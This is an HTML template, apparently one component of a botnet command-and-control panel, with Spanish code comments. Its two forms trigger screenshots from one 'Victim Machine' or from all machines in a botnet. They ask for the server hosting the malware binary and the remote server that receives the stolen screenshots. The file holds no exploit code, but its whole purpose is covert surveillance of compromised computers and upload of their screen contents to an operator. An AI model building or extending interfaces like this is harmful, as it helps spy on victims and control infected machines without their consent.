<app-menu></app-menu>
<h2>SCREENSHOTS FROM VICTIM</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Take one screenshot from Victim Machine.</p>
  <p>Link HTTP server where binary is("http://localhost")<input type="text" /></p>
  <p>Remote IP/DNS Server <input type="text" /></p>
  <input type="submit" value="Execute" />
</form>

<h2>SCREENSHOTS FROM BOTNET</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Take one screenshot from all Victim Machines.</p>
  <p>Link HTTP server where binary is("http://localhost")<input type="text" /></p>
  <p>IP/DNS Server where upload the screenshot <input type="text" /></p>
  <input type="submit" value="Execute" />
</form>
